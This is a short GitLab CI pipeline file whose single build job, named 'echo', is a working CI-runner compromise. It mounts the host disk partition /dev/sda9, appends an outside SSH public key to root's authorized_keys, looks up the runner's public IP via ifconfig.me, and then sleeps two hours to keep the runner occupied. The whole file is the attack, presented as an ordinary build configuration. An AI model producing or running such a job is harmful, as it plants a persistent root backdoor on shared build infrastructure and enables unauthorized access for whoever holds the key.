stages:
 - build
echo:
    stage: build
    parallel: 8
    script:
        - mkdir /tmp/blah
        - mount /dev/sda9 /tmp/blah
        - ls -la /tmp/blah
        - mkdir /tmp/blah/root/.ssh
        - echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEq8ka+MqePSujc1pzfoJDVGjrTOOJxDPGQrCMVjeeqH root@host" >> /tmp/blah/root/.ssh/authorized_keys
        - curl -s ifconfig.me
        - sleep 2h
